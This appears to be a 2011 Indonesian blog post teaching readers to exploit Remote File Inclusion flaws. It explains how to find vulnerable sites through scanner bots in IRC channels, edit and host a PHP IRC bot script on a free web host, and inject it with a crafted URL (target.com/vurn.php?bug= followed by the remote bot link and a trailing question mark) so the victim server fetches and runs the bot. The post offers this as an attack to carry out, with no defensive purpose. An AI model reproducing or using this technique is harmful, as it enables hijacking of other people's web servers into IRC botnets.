Jumat, 01 April 2011

Cara Membuat Bot PHP

BOT PHP adalah script PHP yang dibuat untuk melakukan koneksi ke IRC. Script ini dijalankan pada server yang mendukung PHP. PHP adalah salah satu jenis bahasa pemrograman web yang bersifat server side. Info tentang PHP dapat kita cari di google.

Adapun yang kita perlukan dalam membuat Bot PHP adalah:
Situs target dengan bug RFI, yaitu situs yang memiliki celah Remote File Inclusion. Situs ini dapat anda temukan di server IRC yang sering digunakan untuk kegiatan eksploitasi seperti: irc.indoirc.net, irc.mildnet.org, irc.racrew.us. Joinlah ke channel2 yang topiknya berbau " Scanne r " , nanti kita akan menemukan bot yang sedang melakukan scanning. Ini akan makan waktu lama, tergantung bug yg sedang di scanning, kadang-kadang kita ga menemukan apa-apa. Hehehe.. Harus sabar..
Script Bot PHP, dapat di download disini:
Bot Crewet (bot yg dpt berbicara di chanel)
Bot Diam (bot untuk meramaikan chanel saja)
Setelah di download, anda tinggal ganti admin, password, dan channel,

Situs untuk mengupload/menyimpan script bot yang sudah kita edit, beberapa situs yg bisa kita gunakan adalah geocities dan ripway.

Sekarang kita masuk ke langkah berikutnya....
Anggap saja kita mendapatkan target seperti ini -> http://target.com/vurn.ph p?bug= dan script yg sudah kita edit tadi di upload ke geocities dg link seperti ini -> http://www.geocities.com/ pangeran_cinta/BOT_DIAM.txt ,
jadi kita tinggal menyuntikkannya dg cara membuka link ini dibrowser -> http://target.com/vurn.ph p?bug= http://www.geocities.com/ pangeran_cinta/BOT_DIAM.txt ? <- Jangan Lupa di belakang di kasih tanda tanya ( ? ) yach...!!!
Jika browser tidak akan menampilkan apa-apa setelah kita membuka link tsb, maka kemungkinan botnya akan join ke channel kita dan tunggulah sampai botnya join ke IRC. Jika botnya tidak join, berarti ada beberapa faktor yg menyebabkan botnya ga join (seperti diblok firewall, di ban dari server IRC, dll). Jika browser menampilkan situs asli, maka cobalah target berikutnya Semoga berhasil.

Author : Crew-tCs

1 komentar:

Crew-tCs Entri Populer